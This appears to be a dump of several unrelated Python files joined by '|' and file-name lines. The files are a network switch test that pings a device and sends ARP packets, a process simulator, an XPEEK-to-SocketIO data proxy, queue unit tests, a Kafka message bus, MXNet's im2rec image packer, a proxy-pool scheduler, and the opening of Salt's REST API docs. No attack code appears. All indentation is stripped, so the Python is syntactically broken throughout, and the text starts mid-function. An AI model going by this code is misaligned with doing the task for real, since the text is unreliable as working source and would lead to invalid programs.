flooding = reachable and total_rcv_pkt_cnt > self.ping_dut_pkts
self.log_cpu_state_change(reachable, partial, flooding)
total_rcv_pkt_cnt = self.arpPing()
reachable = total_rcv_pkt_cnt >= self.arp_ping_pkts
self.log_vlan_state_change(reachable)
self.watcher_is_running.set() # Watcher is running.
self.watcher_is_stopped.set() # Watcher has stopped.
self.watcher_is_running.clear() # Watcher has stopped.
def pingFromServers(self):
for i in xrange(self.nr_pc_pkts):
testutils.send_packet(self, self.from_server_src_port, self.from_vlan_packet)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.from_vlan_exp_packet, self.from_server_dst_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d servers->t1" % (self.nr_pc_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def pingFromUpperTier(self):
for entry in self.from_t1:
testutils.send_packet(self, *entry)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.from_t1_exp_packet, self.vlan_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d t1->servers" % (self.nr_vl_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def pingDut(self):
for i in xrange(self.ping_dut_pkts):
testutils.send_packet(self, self.random_port(self.vlan_ports), self.ping_dut_packet)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.ping_dut_exp_packet, self.vlan_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d ping DUT" % (self.ping_dut_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def arpPing(self):
for i in xrange(self.arp_ping_pkts):
testutils.send_packet(self, self.arp_src_port, self.arp_ping)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.arp_resp, [self.arp_src_port], timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d arp ping" % (self.arp_ping_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
|
simulator.py
|
from contextlib import contextmanager
import multiprocessing as mp
class Simulator:
def __init__(self, data_generator, pipeline):
self.data_generator = data_generator
self.data_gen_process = mp.Process(target=self.data_generator)
self.pipeline = pipeline
def start(self):
self.pipeline.start()
self.data_gen_process.start()
@contextmanager
def pause(self):
self.pipeline.pause()
self.data_generator.pause()
try:
yield None
finally:
print("Resuming")
self.pipeline.resume()
self.data_generator.resume()
def stop(self):
self.pipeline.stop()
self.data_generator.stop()
for p in self.pipeline.processes:
if p.is_alive():
p.join()
if self.data_gen_process.is_alive():
self.data_gen_process.join()
self.clear_qs()
def get(self):
return self.pipeline.get()
def clear_qs(self):
self.pipeline.clear_qs()
self.data_generator.q_out.queue.clear()
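# Minimal usage sketch (illustrative; `gen` and `pipe` are hypothetical objects
# providing the pause/resume/stop, q_out and processes attributes used above):
#
#   sim = Simulator(data_generator=gen, pipeline=pipe)
#   sim.start()
#   with sim.pause():
#       snapshot = sim.get()  # read results while everything is paused
#   sim.stop()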
|
xpeek_proxy.py
|
"""
This is an XPEEK listener that forwards messages to the NICE
SocketIO repeater on the data stream
This program requires sioclient and websocket packages to run.
"""
PROXY_PORT = 8001
#import threading
#import types
#import json
#import traceback
import sys
sys.path.append('../server/')
import numpy
import sioclient
import xpeek
import Queue
import signal
from urllib import urlencode  # used by QueuedSocketIO.connect()
#SIO_HOST = '129.6.123.195'
SIO_HOST = 'drneutron.org'
SIO_PORT = 8001 + 2 # publish on port + 2
INSTRUMENT = "CGD"
#INSTRUMENTS = ['BT1','BT4','BT5','BT7','BT8','BT9','CGD','NGD','NG2','NG5','NSE','NG7']
INSTRUMENTS = ['CGD', 'NGD']
#repeater = sioclient.SocketIO(SIO_HOST, SIO_PORT)
#data_channel = repeater.connect('/CGD/data')
#data_channel.emit('data', {"command": "Configure"})
class QueuedDataChannel(sioclient.Channel):
def emit(self, *args, **kw):
self.socket.EmitQueue.put({'args': args, 'kw': kw})
class QueuedSocketIO(sioclient.SocketIO):
def connect(self, channel, handler=None, query=None):
"""
Connect to a channel in the socketIO server.
Returns a connection with emit/send methods for communicating with the
server.
"""
self.channels[channel] = QueuedDataChannel(self, channel, handler)
self.connection.send('1::'+channel+('?'+urlencode(query) if query else ""))
return self.channels[channel]
class KeepAliveSIO(sioclient.SocketIO):
    def _send_heartbeat(self):
        try:
            self.connection.send('2::')
        except Exception:
            # Heartbeat failed; try to re-establish the connection.
            self._connect()
class XPeekToSIO(xpeek.XPeek):
"""
Queue data notifications and plot when the plotting engine
becomes available.
"""
#queue = Queue.Queue()
polarized_ids = ['A', 'B', 'C', 'D']
def __init__(self, instrument, sio_host=SIO_HOST, sio_port=SIO_PORT, debug=True, **kwargs):
xpeek.XPeek.__init__(self, instrument, **kwargs)
self.repeater = KeepAliveSIO(sio_host, sio_port)
self.debug = debug
#self.repeater = sioclient.SocketIO(sio_host, sio_port)
#self.repeater = AutoReconnectSocketIO(sio_host, sio_port)
#self.repeater = repeater
self.data_channel = self.repeater.connect('/%s/data' % (instrument,))
self.previous_lineid = ''
#self.data_channel.emit('data', {"command": "Configure"})
def newdata(self, lineid, plot_opts=None, series_opts=None):
"""Start new plot"""
#logging.debug('Processing new data for '+self.instrument)
plot_opts = {} if plot_opts is None else plot_opts
series_opts = {} if series_opts is None else series_opts
self.isplottable = False
self.current_lineid = lineid
#self.queue.put(self)
runid = self.data[lineid].runid
comment = self.data[lineid].comment
primary = self.data[lineid].primary
prev_pol_id = self.previous_lineid[-2:-1]
curr_pol_id = lineid[-2:-1]
prev_pol_index = self.polarized_ids.index(prev_pol_id) if prev_pol_id in self.polarized_ids else -1
curr_pol_index = self.polarized_ids.index(curr_pol_id) if curr_pol_id in self.polarized_ids else -1
if prev_pol_index < 0 or curr_pol_index < 0 or curr_pol_index <= prev_pol_index:
if self.debug: sys.stdout.write('\t'.join(["resetting: ", str(lineid)])); sys.stdout.flush()
self.data_channel.emit('data', {"command": "Configure", "lineid": lineid, "runid": runid, "comment": comment, "primary": primary, "plot_opts": plot_opts})
self.previous_lineid = lineid
if self.debug: print "new data: ", lineid, self.data[lineid].columns, runid, comment, 'column length:', len(self.data[lineid].columns.keys())
self.data_channel.emit('data', {
"command": "newdata",
"lineid": lineid,
"runid": runid,
"comment": comment,
"primary": primary,
"poiss_err": True,
"series_opts": series_opts})
def enddata(self, lineid):
"""End a plot; plot a peak"""
#logging.debug('Processing end data for '+self.instrument)
self.isplottable = True
self.current_lineid = lineid
#self.queue.put(self)
if self.debug: sys.stdout.write('\t'.join(["end data: ", str(lineid), str(self.data[lineid].columns)])); sys.stdout.flush()
self.data_channel.emit('data', {"command": "enddata", "lineid": lineid})
line = self.data[lineid]
if line.peak:
runid = self.data[lineid].runid
comment = self.data[lineid].comment
primary = self.data[lineid].primary
# Annotate plot with peak parameters
xlo,xhi=line.columns[line.primary][0],line.columns[line.primary][-1]
x = numpy.linspace(xlo,xhi,201)
y = line.peak(x)
new_state = [{
"command": "newdata",
"lineid": lineid + '_fit',
"runid": runid,
"comment": comment,
"primary": primary,
"poiss_err": False,
"series_opts": {"z_index": 10, "markerOptions": {"show": False}}}]
for xx, yy in zip(x,y):
datapoint = {line.primary: xx, 'DATA': yy}
new_state.append({"command": "newpoint", "lineid": lineid + '_fit', "pointdata": datapoint})
self.data_channel.emit('data', {"command": "reset", "lineid": lineid + '_fit', "records": new_state});
def newpoint(self, lineid):
self.isplottable = True
self.current_lineid = lineid
columns = self.data[lineid].columns
column_names = list(columns.keys())
column_names.sort()
datapoint = {}
for cn in column_names:
datapoint[cn] = columns[cn][-1]
#print cn + ': ' + str(columns[cn][-1]),
pass
self.data_channel.emit('data', {"command": "newpoint", "lineid": lineid, "pointdata": datapoint, "eta": self.data[lineid].eta()})
#print
def __repr__(self):
return "XPeekWeb('%s')"%self.instrument
class BT1XPeekToSIO(XPeekToSIO):
BT1_scale = numpy.array([
2.700, 2.479, 2.827, 2.483, 2.260, 2.347, 2.011, 1.749,
1.630, 1.360, 1.339, 1.218, 1.058, 1.000, 1.054, 0.953,
0.941, 0.985, 1.031, 1.021, 0.982, 1.011, 0.900, 1.118,
0.955, 1.056, 0.973, 0.974, 0.943, 0.877, 0.872, 0.820,
])
# BT1 detector zeros in hundredths of a degree
BT1_zeros = numpy.array([
0.00, 1.00, 1.29, -0.48, 1.53, -0.98, 2.03, 0.89,
1.54, 1.28, 0.40, 0.35, 1.53, -1.57, 0.63, 1.43,
-0.08, -0.01, -0.78, 0.16, -1.08, -2.08, -1.23, -0.47,
0.43, -0.27, -2.60, 0.88, -1.34, 2.24, 3.00, 4.00,
]) * 0.01
#BT1_scale = numpy.array(BT1_scl)
#BT1_zeros = numpy.array(BT1_z_c)*0.01
def newpoint(self, lineid):
self.isplottable = True
self.current_lineid = lineid
#################################################
# from ipeek.plot:
all_counts = numpy.array(self.data[lineid].columns['DATA']) * self.BT1_scale
#print "all_counts shape: ", all_counts.shape
i = all_counts.shape[0] - 1
#counts *= self.BT1_scale
a04 = self.data[lineid].columns['A04'][-1]
#print "A04: ", a04
#print "A04 shape: ", numpy.array(self.data[lineid].columns['A04']).shape
x = a04 + 5*numpy.arange(len(self.BT1_zeros)) - self.BT1_zeros
y = all_counts[i] * self.BT1_scale
#################################################
columns = self.data[lineid].columns
column_names = list(columns.keys())
column_names.sort()
datapoint = {}
eta = self.data[lineid].eta()
for cn in column_names:
if cn not in ['DATA', 'A04']:
datapoint[cn] = columns[cn][-1]
#print cn + ': ' + str(columns[cn][-1]),
runid = self.data[lineid].runid
comment = self.data[lineid].comment
primary = self.data[lineid].primary
#self.data_channel.emit('data', {"command": "newdata", "lineid": lineid + str(i), "runid": runid, "comment": comment, "primary": primary})
for i, (xx, yy) in enumerate(zip(x,y)):
datapoint['DATA'] = yy
datapoint['A04'] = xx
self.data_channel.emit('data', {"command": "newpoint", "lineid": lineid + '_%02d' % (i,), "pointdata": datapoint, "eta": eta})
#self.data_channel.emit('data', {"command": "newpoint", "lineid": lineid, "pointdata": datapoint, "eta": self.data[lineid].eta()})
    def newdata(self, lineid, plot_opts=None, series_opts=None):
        # BT1 always overrides the plot options to disable the legend.
        plot_opts = {"legend": {"show": False}}
lineids = [lineid + '_%02d' % (i,) for i in range(len(self.BT1_scale))]
runid = self.data[lineid].runid
comment = self.data[lineid].comment
primary = self.data[lineid].primary
print "resetting: ", lineid
self.data_channel.emit('data', {"command": "Configure", "lineid": lineid, "runid": runid, "comment": comment, "primary": primary, "plot_opts": plot_opts})
for li in lineids:
self.data_channel.emit('data', {"command": "newdata", "lineid": li, "runid": runid, "comment": comment, "primary": primary})
#path='/CGD'
#repeater.connect(path+"/data"), shutdown_signal)
def shutdown(signum, frame):
#print "shutting down", signum, frame
sys.exit(1)
def main(debug=False):
#xpeekpusher = XPeekToSIO(INSTRUMENT)
#xpeekpusher.process_stream()
import threading
threads = []
pushers = []
for instrument in INSTRUMENTS:
        sys.stdout.write('trying to add ' + repr(instrument) + '...\n')
#if instrument == 'BT1':
if 0: #disable BT1 pusher for now
pusher = BT1XPeekToSIO(instrument)
else:
pusher = XPeekToSIO(instrument, debug=debug)
pushers.append(pusher)
new_thread = threading.Thread(target=pusher.process_stream)
threads.append(new_thread)
new_thread.start()
sys.stdout.write(repr(pusher))
sys.stdout.flush()
#signal.signal(signal.SIGTERM, shutdown)
for t in threads:
t.join()
if __name__ == '__main__':
main(debug=True)
|
__init__.py
|
import weakref
import gc
import threading
import unittest
from succession import _Chain, _SuccessionIterator, Succession, TimeoutError
class TestSuccession(unittest.TestCase):
def test_chain(self):
chain = _Chain()
chain.push(2)
self.assertEqual(chain.wait_result(), 2)
self.assertIsInstance(chain.wait_next(), _Chain)
def test_chain_iter(self):
head = _Chain()
chain = head
for i in [1, 2, 3, 4, 5]:
chain = chain.push(i)
chain.close()
self.assertEqual(list(_SuccessionIterator(head)), [1, 2, 3, 4, 5])
def test_memory(self):
# Make sure that chains don't hold references to previous links
chain = _Chain()
head = weakref.ref(chain)
for i in range(1000):
chain = chain.push(i)
gc.collect()
self.assertIsNone(head())
def test_iter_memory(self):
# Make sure that chain iterators do not hold a reference to the head
chain = _Chain()
def push_1000(chain):
for i in range(1000):
chain = chain.push(i)
t = threading.Thread(target=push_1000, args=(chain,), daemon=True)
iterator = _SuccessionIterator(chain)
chain = weakref.ref(chain)
t.start()
for i in range(1000):
next(iterator)
t.join()
gc.collect()
self.assertIsNone(chain())
def test_succession(self):
succession = Succession()
for i in [1, 2, 3, 4, 5]:
succession.push(i)
succession.close()
self.assertEqual(list(succession), [1, 2, 3, 4, 5])
def test_zero_timeout(self):
succession = Succession()
for i in [1, 2, 3, 4, 5]:
succession.push(i)
self.assertEqual(list(succession.iter(timeout=0)), [1, 2, 3, 4, 5])
def test_nonzero_timeout(self):
succession = Succession()
for i in [1, 2, 3, 4, 5]:
succession.push(i)
result = []
try:
for item in succession.iter(timeout=0.01):
result.append(item)
except TimeoutError:
self.assertEqual(result, [1, 2, 3, 4, 5])
else: # pragma: no cover
self.fail()
def test_release_iter(self):
succession = Succession(compress=lambda hd: [])
root = weakref.ref(succession._root)
iterator = weakref.ref(iter(succession))
for i in [1, 2, 3, 4, 5]:
succession.push(i)
gc.collect()
self.assertIsNone(root())
self.assertIsNone(iterator())
def test_compress_after_push(self):
succession = Succession(compress=lambda items: [sum(items)])
from_start = succession.iter()
for i in [1, 2, 3, 4, 5]:
succession.push(i)
succession.close()
from_end = succession.iter()
self.assertEqual(list(from_start), [1, 2, 3, 4, 5])
self.assertEqual(list(from_end), [15])
def test_drop_after_push(self):
succession = Succession(compress=lambda hd: [])
from_start = succession.iter()
for i in [1, 2, 3]:
succession.push(i)
from_middle = succession.iter()
for i in [4, 5, 6]:
succession.push(i)
succession.close()
from_end = succession.iter()
self.assertEqual(list(from_start), [1, 2, 3, 4, 5, 6])
self.assertEqual(list(from_middle), [4, 5, 6])
self.assertEqual(list(from_end), [])
def test_compress_iter_saved(self):
succession = Succession(compress=lambda hd: (i for i in hd))
succession.push(0)
succession.push(1)
succession.push(2)
succession.push(3)
first = succession.head()
second = succession.head()
self.assertEqual(list(first), [0, 1, 2, 3])
self.assertEqual(list(second), [0, 1, 2, 3])
def test_head(self):
succession = Succession()
self.assertEqual(list(succession.head()), [])
for i in [1, 2, 3, 4, 5]:
succession.push(i)
self.assertEqual(list(succession.head()), [1, 2, 3, 4, 5])
succession.close()
def test_echo(self):
req = Succession()
res = Succession()
def echo():
for m in req:
res.push(m)
res.close()
t = threading.Thread(target=echo)
t.start()
res_iter = iter(res)
req.push(1)
self.assertEqual(next(res_iter), 1)
req.push(2)
self.assertEqual(next(res_iter), 2)
req.push(3)
self.assertEqual(next(res_iter), 3)
req.close()
t.join()
loader = unittest.TestLoader()
suite = unittest.TestSuite((
loader.loadTestsFromTestCase(TestSuccession),
))
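# To run this suite directly (illustrative):
#
#   if __name__ == '__main__':
#       unittest.TextTestRunner(verbosity=2).run(suite)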
|
kafka_mb.py
|
from typing import Any, Callable, Mapping
from kafka import KafkaProducer, KafkaConsumer
from helpers.transport.interface import MessageBus
from helpers.transport.kafka_config import KafkaEventMap
import threading
def get_kafka_connection_parameters(bootstrap_servers: str, sasl_mechanism: str, sasl_plain_username: str = '', sasl_plain_password: str = '') -> Mapping[str, Any]:
if sasl_mechanism == '':
sasl_mechanism = 'PLAIN'
return {
'bootstrap_servers': bootstrap_servers,
'sasl_mechanism': sasl_mechanism,
'sasl_plain_username': sasl_plain_username,
'sasl_plain_password': sasl_plain_password
}
class KafkaMessageBus(MessageBus):
def __init__(self, kafka_connection_parameters: Mapping[str, Any], kafka_event_map: KafkaEventMap, **kafka_config: Any):
self.kafka_connection_parameters = kafka_connection_parameters
self.kafka_event_map = kafka_event_map
self.consumers: Mapping[str, KafkaConsumer] = {}
self.event_map = kafka_event_map
def shutdown(self):
for event_name, consumer in self.consumers.items():
print('stop listening to {event_name}'.format(event_name=event_name))
consumer.close()
def handle(self, event_name: str) -> Callable[..., Any]:
        def register_event_handler(event_handler: Callable[[Any], Any]):
            topic = self.event_map.get_topic(event_name)
            group_id = self.event_map.get_group_id(event_name)
            consumer = KafkaConsumer(topic, group_id=group_id, **self.kafka_connection_parameters)
            self.consumers[event_name] = consumer
            thread = threading.Thread(target=self._handle, args=[consumer, event_name, topic, group_id, event_handler])
            thread.start()
            # Return the handler so the decorated name still refers to it.
            return event_handler
        return register_event_handler
def _handle(self, consumer: KafkaConsumer, event_name: str, topic: str, group_id: str, event_handler: Callable[[Any], Any]):
for serialized_message in consumer:
message = self.event_map.get_decoder(event_name)(serialized_message.value)
print({'action': 'handle_kafka_event', 'event_name': event_name, 'message': message, 'topic': topic, 'group_id': group_id, 'serialized': serialized_message})
event_handler(message)
def publish(self, event_name: str, message: Any) -> Any:
producer = KafkaProducer(**self.kafka_connection_parameters)
topic = self.event_map.get_topic(event_name)
serialized_message = self.event_map.get_encoder(event_name)(message)
print({'action': 'publish_kafka_event', 'event_name': event_name, 'message': message, 'topic': topic, 'serialized': serialized_message})
producer.send(topic, serialized_message)
producer.close()
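# Minimal usage sketch (hypothetical event name, event map and servers):
#
#   params = get_kafka_connection_parameters('localhost:9092', 'PLAIN')
#   mb = KafkaMessageBus(params, kafka_event_map)
#
#   @mb.handle('user_registered')
#   def on_user_registered(message):
#       print('got', message)
#
#   mb.publish('user_registered', {'id': 1})
#   # ... later: mb.shutdown()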
|
im2rec.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import os
import sys
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
try:
import multiprocessing
except ImportError:
multiprocessing = None
def list_image(root, recursive, exts):
    """Traverses the root directory that contains images and
    generates an image list iterator.
    Parameters
    ----------
    root: string
    recursive: bool
    exts: list of acceptable image extensions
    Returns
    -------
    image iterator that contains all the images under the specified path
    """
i = 0
if recursive:
cat = {}
for path, dirs, files in os.walk(root, followlinks=True):
dirs.sort()
files.sort()
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (i, os.path.relpath(fpath, root), cat[path])
i += 1
for k, v in sorted(cat.items(), key=lambda x: x[1]):
print(os.path.relpath(k, root), v)
else:
for fname in sorted(os.listdir(root)):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
yield (i, os.path.relpath(fpath, root), 0)
i += 1
def write_list(path_out, image_list):
"""Hepler function to write image list into the file.
The format is as below,
integer_image_index \t float_label_index \t path_to_image
Note that the blank between number and tab is only used for readability.
Parameters
----------
path_out: string
image_list: list
"""
with open(path_out, 'w') as fout:
for i, item in enumerate(image_list):
line = '%d\t' % item[0]
for j in item[2:]:
line += '%f\t' % j
line += '%s\n' % item[1]
fout.write(line)
def make_list(args):
"""Generates .lst file.
Parameters
----------
args: object that contains all the arguments
"""
image_list = list_image(args.root, args.recursive, args.exts)
image_list = list(image_list)
if args.shuffle is True:
random.seed(100)
random.shuffle(image_list)
N = len(image_list)
chunk_size = (N + args.chunks - 1) // args.chunks
for i in range(args.chunks):
chunk = image_list[i * chunk_size:(i + 1) * chunk_size]
if args.chunks > 1:
str_chunk = '_%d' % i
else:
str_chunk = ''
sep = int(chunk_size * args.train_ratio)
sep_test = int(chunk_size * args.test_ratio)
if args.train_ratio == 1.0:
write_list(args.prefix + str_chunk + '.lst', chunk)
else:
if args.test_ratio:
write_list(args.prefix + str_chunk + '_test.lst', chunk[:sep_test])
if args.train_ratio + args.test_ratio < 1.0:
write_list(args.prefix + str_chunk + '_val.lst', chunk[sep_test + sep:])
write_list(args.prefix + str_chunk + '_train.lst', chunk[sep_test:sep_test + sep])
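# For example, "--chunks 2 --train-ratio 0.8 --test-ratio 0.1" with prefix
# "data" produces data_0_train.lst, data_0_val.lst and data_0_test.lst, plus
# the same trio suffixed with _1 (illustrative file names).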
def read_list(path_in):
"""Reads the .lst file and generates corresponding iterator.
Parameters
----------
path_in: string
Returns
-------
item iterator that contains information in .lst file
"""
with open(path_in) as fin:
while True:
line = fin.readline()
if not line:
break
line = [i.strip() for i in line.strip().split('\t')]
line_len = len(line)
# check the data format of .lst file
if line_len < 3:
                print('lst should have at least three parts, but only has %s parts for %s' % (line_len, line))
continue
try:
item = [int(line[0])] + [line[-1]] + [float(i) for i in line[1:-1]]
except Exception as e:
print('Parsing lst met error for %s, detail: %s' % (line, e))
continue
yield item
def image_encode(args, i, item, q_out):
"""Reads, preprocesses, packs the image and put it back in output queue.
Parameters
----------
args: object
i: int
item: list
q_out: queue
"""
fullpath = os.path.join(args.root, item[1])
if len(item) > 3 and args.pack_label:
header = mx.recordio.IRHeader(0, item[2:], item[0], 0)
else:
header = mx.recordio.IRHeader(0, item[2], item[0], 0)
if args.pass_through:
try:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, item))
except Exception as e:
traceback.print_exc()
print('pack_img error:', item[1], e)
q_out.put((i, None, item))
return
try:
img = cv2.imread(fullpath, args.color)
except:
traceback.print_exc()
print('imread error trying to load file: %s ' % fullpath)
q_out.put((i, None, item))
return
if img is None:
print('imread read blank (None) image for file: %s' % fullpath)
q_out.put((i, None, item))
return
if args.center_crop:
if img.shape[0] > img.shape[1]:
margin = (img.shape[0] - img.shape[1]) // 2
img = img[margin:margin + img.shape[1], :]
else:
margin = (img.shape[1] - img.shape[0]) // 2
img = img[:, margin:margin + img.shape[0]]
if args.resize:
if img.shape[0] > img.shape[1]:
newsize = (args.resize, img.shape[0] * args.resize // img.shape[1])
else:
newsize = (img.shape[1] * args.resize // img.shape[0], args.resize)
img = cv2.resize(img, newsize)
try:
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, item))
except Exception as e:
traceback.print_exc()
print('pack_img error on file: %s' % fullpath, e)
q_out.put((i, None, item))
return
def read_worker(args, q_in, q_out):
"""Function that will be spawned to fetch the image
from the input queue and put it back to output queue.
Parameters
----------
args: object
q_in: queue
q_out: queue
"""
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
"""Function that will be spawned to fetch processed image
from the output queue and write to the .rec file.
Parameters
----------
q_out: queue
fname: string
working_dir: string
"""
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
"""Defines all arguments.
Returns
-------
args object that contains all the params
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', action='store_true',
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg', '.png'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', action='store_true',
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--no-shuffle', dest='shuffle', action='store_false',
help='If this is passed, \
im2rec will not randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--pass-through', action='store_true',
help='whether to skip transformation and save image as is')
rgroup.add_argument('--resize', type=int, default=0,
help='resize the shorter edge of image to the newsize, original images will\
be packed by default.')
rgroup.add_argument('--center-crop', action='store_true',
help='specify whether to crop the center image to make it rectangular.')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', action='store_true',
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
args.root = os.path.abspath(args.root)
return args
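# Typical invocations (illustrative):
#
#   python im2rec.py --list --recursive mydata ./images   # create mydata.lst
#   python im2rec.py --num-thread 4 mydata ./images       # pack mydata.rec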
if __name__ == '__main__':
args = parse_args()
# if the '--list' is used, it generates .lst file
if args.list:
make_list(args)
# otherwise read .lst file to generates .rec file
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
# define the process
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
# process images with num_thread process
for p in read_process:
p.start()
                    # only use one process to write .rec to avoid race-condition
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
# put the image list into input queue
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, _ = q_out.get()
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
        if not count:
            print('Did not find any .lst file with prefix %s' % args.prefix)
|
scheduler.py
|
import time
from multiprocessing import Process
from proxypool.api import app
from proxypool.getter import Getter
from proxypool.tester import Tester
from proxypool.db import RedisClient
from proxypool.setting import *
class Scheduler():
    def schedule_tester(self, cycle=TESTER_CYCLE):
        """
        Test proxies periodically
        """
        tester = Tester()
        while True:
            print('Tester starts running')
            tester.run()
            time.sleep(cycle)
    def schedule_getter(self, cycle=GETTER_CYCLE):
        """
        Fetch proxies periodically
        """
        getter = Getter()
        while True:
            print('Start crawling proxies')
            getter.run()
            time.sleep(cycle)
    def schedule_api(self):
        """
        Start the API server
        """
        app.run(API_HOST, API_PORT, debug=True)
    def run(self):
        print('Proxy pool starts running')
        # test proxies periodically
        if TESTER_ENABLED:
            tester_process = Process(target=self.schedule_tester)
            tester_process.start()
        # fetch new proxies periodically
        if GETTER_ENABLED:
            getter_process = Process(target=self.schedule_getter)
            getter_process.start()
        # serve the API
        if API_ENABLED:
            api_process = Process(target=self.schedule_api)
            api_process.start()
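# Typical entry point (illustrative):
#
#   if __name__ == '__main__':
#       Scheduler().run()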
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
